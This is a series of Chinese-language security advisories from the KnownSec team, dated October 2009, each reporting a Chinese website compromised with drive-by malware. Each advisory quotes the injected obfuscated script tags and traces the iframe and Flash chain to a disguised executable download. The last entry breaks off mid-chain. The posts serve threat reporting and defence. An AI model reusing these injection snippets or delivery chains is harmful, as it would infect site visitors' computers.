知道创宇

中国马业网被植入恶意代码

发布时间：Sat Oct 31 2009 22:00:32 UTC+0800
最后更新时间：Sat Oct 31 2009 22:00:32 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获中国马业网（http://horsemanship.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://horsemanship.cn/

网页被嵌入恶意链接代码：
<script src=http://%63%68%75n%72%61ng%2E%63%6F%6D%2Ec%6E></script><script src=http://%68n%33gp.%63%6E></script><script src=http://fu%6Ai%61nc%6Cub.c%6E></script><script src=http://%6Do%62%69h%6F%6De%73%2E%63n></script><script src=http://%63hni%61nam%65%2E%63%6E></script>

挂马分析：
[root]http://horsemanship.cn/
    [script]http://horsemanship.cn/js/end.js
    [script]http://chunrang.com.cn
        [iframe]http://sale.php?domain=chunrang.com.cn
    [script]http://hn3gp.cn
        [iframe]http://ji52.2288.org/dszq/2.htm
            [iframe]http://aeo5p.cn/x2/xx.html
                [iframe]http://aeo5p.cn/x2/td14.htm
                    [script]http://aeo5p.cn/x2/14.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://aeo5p.cn/x2/15.js
                    [script]http://aeo5p.cn/x2/17.js
                    [script]http://aeo5p.cn/x2/16.js
                    [script]http://aeo5p.cn/x2/18.js
                [iframe]http://aeo5p.cn/x2/yt.htm
                    [script]http://aeo5p.cn/x2/nn1.jpg
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://aeo5p.cn/x2/nnn1.jpg
                    [script]http://aeo5p.cn/x2/yt1.js
                        [script]http://aeo5p.cn/x2/nnnn.jpg
                        [script]http://aeo5p.cn/x2/cc.jpg
                        [script]http://aeo5p.cn/x2/e.jpg
                        [script]http://aeo5p.cn/x2/f.jpg
                [iframe]http://aeo5p.cn/x2/td09.htm
                    [script]http://aeo5p.cn/x2/01.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://aeo5p.cn/x2/02.js
                [iframe]http://aeo5p.cn/x2/yut.htm
                    [iframe]http://aeo5p.cn/x2/ytfl1.htm
                        [iframe]http://aeo5p.cn/x2/x1.htm
                            [script]http://aeo5p.cn/x2/swfobject.js
                            [flash]http://aeo5p.cn/x2/./x1.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://aeo5p.cn/x2/./x3.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://aeo5p.cn/x2/./x4.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://aeo5p.cn/x2/./x2.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://aeo5p.cn/x2/x2.htm
                            [script]http://aeo5p.cn/x2/swfobject.js
                            [flash]http://aeo5p.cn/x2/./x7.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://aeo5p.cn/x2/./x9.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://aeo5p.cn/x2/./x10.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://aeo5p.cn/x2/./x8.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://aeo5p.cn/x2/x1.htm
                    [iframe]http://aeo5p.cn/x2/of.htm
                        [script]http://aeo5p.cn/x2/of.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [script]http://aeo5p.cn/x2/of1.js
                        [script]http://aeo5p.cn/x2/of3.jpg
                        [script]http://aeo5p.cn/x2/of.jpg
                        [script]http://aeo5p.cn/x2/of2.jpg
                [iframe]http://aeo5p.cn/x2/ytu.htm
                    [iframe]http://aeo5p.cn/x2/ytfl.htm
                        [iframe]http://aeo5p.cn/x2/ff.html
                            [script]http://aeo5p.cn/x2/ff.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://aeo5p.cn/x2/ie.html
                            [script]http://aeo5p.cn/x2/ie.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://aeo5p.cn/x2/ff.html
                        [iframe]http://aeo5p.cn/x2/ie.html
                        [iframe]http://aeo5p.cn/x2/ff.html
                        [iframe]http://aeo5p.cn/x2/ff.html
    [script]http://fujianclub.cn
        [iframe]http://ji52.2288.org/dszq/2.htm
    [script]http://mobihomes.cn
        [iframe]http://ji52.2288.org/dszq/2.htm
    [script]http://chnianame.cn
        [iframe]http://ji52.2288.org/dszq/2.htm
最终下载病毒文件：
http://d.lnxwy.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：33
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司 www.knownsec.com

Popularity: 5% [?]

网站挂马记录 lk 31 Oct 2009 No Comments

游戏365被植入恶意代码

发布时间：Thu Oct 29 2009 19:00:57 UTC+0800
最后更新时间：Thu Oct 29 2009 19:00:57 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获游戏365（http://www.g365.net/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://sns.g365.net/

网页被嵌入恶意链接代码：
<script src=http://hn%33g%70.%63n></script><script src=http://nm%67%68lbr%2E%63%6E></script>

挂马分析：
[root]http://sns.g365.net/
    [script]http://hn3gp.cn
        [iframe]http://hhd2.6600.org/dszq/2.htm
    [script]http://nmghlbr.cn
        [iframe]http://hhd2.6600.org/dszq/2.htm
            [iframe]http://agjt1h.cn/x2/xx.html
                [iframe]http://agjt1h.cn/x2/td14.htm
                    [script]http://agjt1h.cn/x2/14.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://agjt1h.cn/x2/15.js
                    [script]http://agjt1h.cn/x2/17.js
                    [script]http://agjt1h.cn/x2/16.js
                    [script]http://agjt1h.cn/x2/18.js
                [iframe]http://agjt1h.cn/x2/yt.htm
                    [script]http://agjt1h.cn/x2/nn.jpg
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://agjt1h.cn/x2/nnn.jpg
                    [script]http://agjt1h.cn/x2/nnnn.jpg
                    [script]http://agjt1h.cn/x2/yt1.js
                        [script]http://agjt1h.cn/x2/cc.jpg
                        [script]http://agjt1h.cn/x2/e.jpg
                        [script]http://agjt1h.cn/x2/f.jpg
                [iframe]http://agjt1h.cn/x2/td09.htm
                    [script]http://agjt1h.cn/x2/01.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://agjt1h.cn/x2/02.js
                [iframe]http://agjt1h.cn/x2/yut.htm
                    [iframe]http://agjt1h.cn/x2/ytfl1.htm
                        [iframe]http://agjt1h.cn/x2/x1.htm
                            [script]http://agjt1h.cn/x2/swfobject.js
                            [flash]http://agjt1h.cn/x2/./x1.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://agjt1h.cn/x2/./x3.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://agjt1h.cn/x2/./x4.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://agjt1h.cn/x2/./x2.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://agjt1h.cn/x2/x2.htm
                            [script]http://agjt1h.cn/x2/swfobject.js
                            [flash]http://agjt1h.cn/x2/./x7.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://agjt1h.cn/x2/./x9.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://agjt1h.cn/x2/./x10.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://agjt1h.cn/x2/./x8.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://agjt1h.cn/x2/x1.htm
                    [iframe]http://agjt1h.cn/x2/of.htm
                        [script]http://agjt1h.cn/x2/of.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [script]http://agjt1h.cn/x2/of1.js
                        [script]http://agjt1h.cn/x2/of3.jpg
                        [script]http://agjt1h.cn/x2/of.jpg
                        [script]http://agjt1h.cn/x2/of2.jpg
                [iframe]http://agjt1h.cn/x2/ytu.htm
                    [iframe]http://agjt1h.cn/x2/ytfl.htm
                        [iframe]http://agjt1h.cn/x2/ff.html
                            [script]http://agjt1h.cn/x2/ff.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://agjt1h.cn/x2/ie.html
                            [script]http://agjt1h.cn/x2/ie.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://agjt1h.cn/x2/ff.html
                        [iframe]http://agjt1h.cn/x2/ie.html
                        [iframe]http://agjt1h.cn/x2/ff.html
                        [iframe]http://agjt1h.cn/x2/ff.html
最终下载病毒文件：
http://d.lnxwy.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：5
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司 www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 29 Oct 2009 No Comments

中国医学教育网被植入恶意代码

发布时间：Wed Oct 28 2009 16:38:27 UTC+0800
最后更新时间：Wed Oct 28 2009 16:38:27 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获中国医学教育网（http://www.chinayxjy.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.chinayxjy.com/

网页被嵌入恶意链接代码：
<script src=http://%77%76%67%37%2E%63%6E></script><script src=http://%63%6B%74%31%2E%63%6E></script><script src=http://%63%6B%74%31%2E%63%6E></script><script src=http://%63%6B%74%33%2E%63%6E></script><script src=http://%63%6B%74%36%2E%63%6E></script><script src=http://%77%2E%73%69%79%6F%75%2E%6F%72%67%2E%63%6E></script><script src=http://%77%2E%6A%73%67%75%61%6E%67%6A%69%2E%63%6E></script><script src=http://%77%2E%74%6D%64%32%35%30%2E%63%6F%6D%2E%63%6E></script><script src=http://%77%2E%74%6F%79%6F%6E%79%2E%63%6F%6D%2E%63%6E></script><script src=http://%77%2E%74%74%6B%69%73%73%2E%63%6F%6D%2E%63%6E></script><script src=http://%67%75%61%6E%6C%69%73%2E%63%6E></script><script src=http://%6D%61%73%68%75%63%6E%2E%63%6E></script>

挂马分析：
[root]http://www.chinayxjy.com/
    [script]http://w.siyou.org.cn
        [iframe]http://dydn8.6600.org/dszq/2.htm
            [iframe]http://99bop.cn/x2/xx.html
                [iframe]http://99bop.cn/x2/td14.htm
                    [script]http://99bop.cn/x2/14.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://99bop.cn/x2/15.js
                    [script]http://99bop.cn/x2/17.js
                    [script]http://99bop.cn/x2/16.js
                    [script]http://99bop.cn/x2/18.js
                [iframe]http://99bop.cn/x2/yt.htm
                    [script]http://99bop.cn/x2/nn.jpg
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://99bop.cn/x2/nnn.jpg
                    [script]http://99bop.cn/x2/nnnn.jpg
                    [script]http://99bop.cn/x2/yt1.js
                        [script]http://99bop.cn/x2/cc.jpg
                        [script]http://99bop.cn/x2/e.jpg
                        [script]http://99bop.cn/x2/f.jpg
                [iframe]http://99bop.cn/x2/td09.htm
                    [script]http://99bop.cn/x2/01.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://99bop.cn/x2/02.js
                [iframe]http://99bop.cn/x2/yut.htm
                    [iframe]http://99bop.cn/x2/ytfl1.htm
                        [iframe]http://99bop.cn/x2/x1.htm
                            [script]http://99bop.cn/x2/swfobject.js
                            [flash]http://99bop.cn/x2/./x1.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://99bop.cn/x2/./x3.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://99bop.cn/x2/./x4.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://99bop.cn/x2/./x2.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://99bop.cn/x2/x2.htm
                            [script]http://99bop.cn/x2/swfobject.js
                            [flash]http://99bop.cn/x2/./x7.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://99bop.cn/x2/./x9.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://99bop.cn/x2/./x10.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://99bop.cn/x2/./x8.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://99bop.cn/x2/x1.htm
                    [iframe]http://99bop.cn/x2/of.htm
                        [script]http://99bop.cn/x2/of.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [script]http://99bop.cn/x2/of1.js
                        [script]http://99bop.cn/x2/of3.jpg
                        [script]http://99bop.cn/x2/of.jpg
                        [script]http://99bop.cn/x2/of2.jpg
                [iframe]http://99bop.cn/x2/ytu.htm
                    [iframe]http://99bop.cn/x2/ytfl.htm
                        [iframe]http://99bop.cn/x2/ff.html
                            [script]http://99bop.cn/x2/ff.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://99bop.cn/x2/ie.html
                            [script]http://99bop.cn/x2/ie.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://99bop.cn/x2/ff.html
                        [iframe]http://99bop.cn/x2/ie.html
                        [iframe]http://99bop.cn/x2/ff.html
                        [iframe]http://99bop.cn/x2/ff.html

最终下载病毒文件：
http://d.lnxwy.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：49
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司 www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 28 Oct 2009 No Comments

西安电子科技大学被植入恶意代码

发布时间：Tue Oct 27 2009 18:19:53 UTC+0800
最后更新时间：Tue Oct 27 2009 18:19:53 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获西安电子科技大学（http://www.xidian.edu.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://mba.xidian.edu.cn/

网页被嵌入恶意链接代码：
<script src=http://ch%75nr%61ng%2E%63%6F%6D%2E%63n></script><script src=http://ch%75nr%61ng%2E%63%6F%6D%2E%63n></script><script src=http://h%6E%33%67%70%2E%63%6E></script><script src=http://h%6E%33%67%70%2E%63%6E></script><script src=http://u%72%62a%6Ehu%62%2E%63n></script><script src=http://u%72%62a%6Ehu%62%2E%63n></script><script src=http://%68h%68%74l%69ve%2E%63n></script><script src=http://%68h%68%74l%69ve%2E%63n></script><script src=http://%6D%6Fbi%68%6Fm%65%73%2Ec%6E></script><script src=http://%6D%6Fbi%68%6Fm%65%73%2Ec%6E></script><script src=http://%63%68n%69%61n%61m%65.%63%6E></script><script src=http://%63%68n%69%61n%61m%65.%63%6E></script><script src=http://ope%6E%74e%6B.c%6E></script><script src=http://ope%6E%74e%6B.c%6E></script>

挂马分析：
[root]http://mba.xidian.edu.cn/
    [script]http://hn3gp.cn
        [iframe]http://28ok.8866.org/dszq/2.htm
            [iframe]http://77jdf.cn/x2/xx.html
                [iframe]http://77jdf.cn/x2/td14.htm
                    [script]http://77jdf.cn/x2/14.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://77jdf.cn/x2/15.js
                    [script]http://77jdf.cn/x2/17.js
                    [script]http://77jdf.cn/x2/16.js
                    [script]http://77jdf.cn/x2/18.js
                [iframe]http://77jdf.cn/x2/yt.htm
                    [script]http://77jdf.cn/x2/nn.jpg
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://77jdf.cn/x2/nnn.jpg
                    [script]http://77jdf.cn/x2/nnnn.jpg
                    [script]http://77jdf.cn/x2/yt1.js
                        [script]http://77jdf.cn/x2/cc.jpg
                        [script]http://77jdf.cn/x2/e.jpg
                        [script]http://77jdf.cn/x2/f.jpg
                [iframe]http://77jdf.cn/x2/td09.htm
                    [script]http://77jdf.cn/x2/01.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://77jdf.cn/x2/02.js
                [iframe]http://77jdf.cn/x2/yut.htm
                    [iframe]http://77jdf.cn/x2/ytfl1.htm
                        [iframe]http://77jdf.cn/x2/x1.htm
                            [script]http://77jdf.cn/x2/swfobject.js
                            [flash]http://77jdf.cn/x2/./x1.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://77jdf.cn/x2/./x3.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://77jdf.cn/x2/./x4.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://77jdf.cn/x2/./x2.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://77jdf.cn/x2/x2.htm
                            [script]http://77jdf.cn/x2/swfobject.js
                            [flash]http://77jdf.cn/x2/./x7.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://77jdf.cn/x2/./x9.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://77jdf.cn/x2/./x10.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://77jdf.cn/x2/./x8.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://77jdf.cn/x2/x1.htm
                    [iframe]http://77jdf.cn/x2/of.htm
                        [script]http://77jdf.cn/x2/of.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [script]http://77jdf.cn/x2/of1.js
                        [script]http://77jdf.cn/x2/of3.jpg
                        [script]http://77jdf.cn/x2/of.jpg
                        [script]http://77jdf.cn/x2/of2.jpg
                [iframe]http://77jdf.cn/x2/ytu.htm
                    [iframe]http://77jdf.cn/x2/ytfl.htm
                        [iframe]http://77jdf.cn/x2/ff.html
                            [script]http://77jdf.cn/x2/ff.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://77jdf.cn/x2/ie.html
                            [script]http://77jdf.cn/x2/ie.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://77jdf.cn/x2/ff.html
                        [iframe]http://77jdf.cn/x2/ie.html
                        [iframe]http://77jdf.cn/x2/ff.html
                        [iframe]http://77jdf.cn/x2/ff.html

最终下载病毒文件：
http://d.lnxwy.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司 www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 27 Oct 2009 No Comments

廊坊都市网被植入恶意代码

发布时间：Mon Oct 26 2009 19:48:57 UTC+0800
最后更新时间：Mon Oct 26 2009 19:48:57 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获廊坊都市网（http://www.0316.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.0316.cn/

网页被嵌入恶意链接代码：
<script src=http://%39%36%33%2E%73%73%2E%6C” alt=”" width=”32″ height=”32″ />

挂马分析：
[root]http://quan.0316.cn/
    [script]http://z360.net/c.js
        [iframe]http://z360.net/0.htm
            [iframe]http://ddyyb.2288.org/fkzd/16.htm
                [iframe]http://66bgh.cn/x150/xx.html
                    [iframe]http://66bgh.cn/x150/td14.htm
                        [script]http://66bgh.cn/x150/14.js
                            [exe]http://d.lnxwy.com/xx/x150.css
                        [script]http://66bgh.cn/x150/15.js
                        [script]http://66bgh.cn/x150/17.js
                        [script]http://66bgh.cn/x150/16.js
                        [script]http://66bgh.cn/x150/18.js
                    [iframe]http://66bgh.cn/x150/yt.htm
                        [script]http://66bgh.cn/x150/a.jpg
                            [exe]http://d.lnxwy.com/xx/x150.css
                        [script]http://66bgh.cn/x150/a1.jpg
                        [script]http://66bgh.cn/x150/c.jpg
                        [script]http://66bgh.cn/x150/d.jpg
                        [script]http://66bgh.cn/x150/e.jpg
                        [script]http://66bgh.cn/x150/f.jpg
                    [iframe]http://66bgh.cn/x150/td09.htm
                        [script]http://66bgh.cn/x150/01.js
                            [exe]http://d.lnxwy.com/xx/x150.css
                        [script]http://66bgh.cn/x150/02.js
                    [iframe]http://66bgh.cn/x150/yut.htm
                        [iframe]http://66bgh.cn/x150/ytfl1.htm
                            [iframe]http://66bgh.cn/x150/x1.htm
                                [script]http://66bgh.cn/x150/swfobject.js
                                [flash]http://66bgh.cn/x150/./x1.swf
                                    [exe]http://d.lnxwy.com/xx/x150.css
                                [flash]http://66bgh.cn/x150/./x3.swf
                                    [exe]http://d.lnxwy.com/xx/x150.css
                                [flash]http://66bgh.cn/x150/./x4.swf
                                    [exe]http://d.lnxwy.com/xx/x150.css
                                [flash]http://66bgh.cn/x150/./x2.swf
                                    [exe]http://d.lnxwy.com/xx/x150.css
                            [iframe]http://66bgh.cn/x150/x2.htm
                                [script]http://66bgh.cn/x150/swfobject.js
                                [flash]http://66bgh.cn/x150/./x7.swf
                                    [exe]http://d.lnxwy.com/xx/x150.css
                                [flash]http://66bgh.cn/x150/./x9.swf
                                    [exe]http://d.lnxwy.com/xx/x150.css
                                [flash]http://66bgh.cn/x150/./x10.swf
                                    [exe]http://d.lnxwy.com/xx/x150.css
                                [flash]http://66bgh.cn/x150/./x8.swf
                                    [exe]http://d.lnxwy.com/xx/x150.css
                            [iframe]http://66bgh.cn/x150/x1.htm
                        [iframe]http://66bgh.cn/x150/of.htm
                            [script]http://66bgh.cn/x150/of.js
                                [exe]http://d.lnxwy.com/xx/x150.css
                            [script]http://66bgh.cn/x150/of3.jpg
                            [script]http://66bgh.cn/x150/of.jpg
                            [script]http://66bgh.cn/x150/of2.jpg
                    [iframe]http://66bgh.cn/x150/ytu.htm
                        [iframe]http://66bgh.cn/x150/ytfl.htm
                            [iframe]http://66bgh.cn/x150/ff.html
                                [script]http://66bgh.cn/x150/ff.js
                                [exe]http://d.lnxwy.com/xx/x150.css
                            [iframe]http://66bgh.cn/x150/ie.html
                                [script]http://66bgh.cn/x150/ie.js
                                [exe]http://d.lnxwy.com/xx/x150.css
                            [iframe]http://66bgh.cn/x150/ff.html
                            [iframe]http://66bgh.cn/x150/ie.html
                            [iframe]http://66bgh.cn/x150/ff.html
                            [iframe]http://66bgh.cn/x150/ff.html
最终下载病毒文件：
http://d.lnxwy.com/xx/x150.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：27
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司 www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 26 Oct 2009 No Comments

北京市育成才自考书店被植入恶意代码

发布时间：Sat Oct 24 2009 21:02:53 UTC+0800
最后更新时间：Sat Oct 24 2009 21:02:53 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获北京市育成才自考书店（http://www.bookshop365.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.bookshop365.com/

网页被嵌入恶意链接代码：
<script src=http://%6B%75%6D%6F%67%72%6F%75%70%2E%63%6E></script><script src=http://%6A%61%6D%65%73%66%61%6E%73%2E%63%6E></script><script src=http://%6E%65%69%6D%65%6E%67%6E%65%74%2E%63%6E></script><script src=http://%77%75%78%69%66%64%63%2E%63%6E></script><script src=http://%7A%67%75%6E%69%6F%6E%2E%63%6E></script><script src=http://%6E%6D%67%7A%6C%74%2E%63%6E></script><script src=http://%73%68%65%6E%67%6C%76%65%2E%63%6E></script><script src=http://%65%67%65%6E%6F%6D%65%2E%63%6E></script><script src=http://%63%6C%61%6E%6E%74%2E%63%6E></script><script src=http://%35%31%33%31%34%38%2E%63%6E></script><script src=http://%79%6F%75%64%75%6E%7A%69%2E%63%6E></script><script src=http://%38%320%34%38.cn></script><script src=http://%63z%6Aj%7A%63%2Ec%6E></script><script src=http://li%6E%6Bs%6E%65t.c%6E></script><script src=http://w%75%78%69o%6C.%63n></script><script src=http://c%68%75nra%6Eg.com.%63n></script><script src=http://hn3%67p.c%6E></script><script src=http://h%68h%74li%76%65%2Ecn></script>

挂马分析：
[root]http://www.bookshop365.com/
    [script]http://js.tongji.cn.yahoo.com/879115/ystat.js
    [script]http://www.bookshop365.com/js/mystat.asp
    [script]http://www.bookshop365.com/qqonline/qq.asp
        [script]http://www.bookshop365.com/qqonline/info.asp
            [script]http://wvg7.cn
            [script]http://ckt1.cn
            [script]http://ckt1.cn
            [script]http://ckt6.cn
            [script]http://w.siyou.org.cn
            [script]http://w.jsguangji.cn
        [script]http://www.bookshop365.com/qqonline/script.asp
        [script]http://wvg7.cn
        [script]http://ckt1.cn
        [script]http://ckt1.cn
        [script]http://ckt6.cn
        [script]http://w.siyou.org.cn
            [iframe]http://nkb0.6600.org/dszq/2.htm
        [script]http://w.jsguangji.cn
            [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://kumogroup.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://jamesfans.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://neimengnet.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://wuxifdc.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
            [iframe]http://44ghe.cn/x2/xx.html
                [iframe]http://44ghe.cn/x2/td14.htm
                    [script]http://44ghe.cn/x2/14.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://44ghe.cn/x2/15.js
                    [script]http://44ghe.cn/x2/17.js
                    [script]http://44ghe.cn/x2/16.js
                    [script]http://44ghe.cn/x2/18.js
                [iframe]http://44ghe.cn/x2/yt.htm
                    [script]http://44ghe.cn/x2/a.jpg
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://44ghe.cn/x2/a1.jpg
                    [script]http://44ghe.cn/x2/c.jpg
                    [script]http://44ghe.cn/x2/d.jpg
                    [script]http://44ghe.cn/x2/e.jpg
                    [script]http://44ghe.cn/x2/f.jpg
                [iframe]http://44ghe.cn/x2/td09.htm
                    [script]http://44ghe.cn/x2/01.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://44ghe.cn/x2/02.js
                [iframe]http://44ghe.cn/x2/yut.htm
                    [iframe]http://44ghe.cn/x2/ytfl1.htm
                        [iframe]http://44ghe.cn/x2/x1.htm
                            [script]http://44ghe.cn/x2/swfobject.js
                            [flash]http://44ghe.cn/x2/./x1.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x3.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x4.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x2.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://44ghe.cn/x2/x2.htm
                            [script]http://44ghe.cn/x2/swfobject.js
                            [flash]http://44ghe.cn/x2/./x7.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x9.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x10.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x8.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://44ghe.cn/x2/x1.htm
                    [iframe]http://44ghe.cn/x2/of.htm
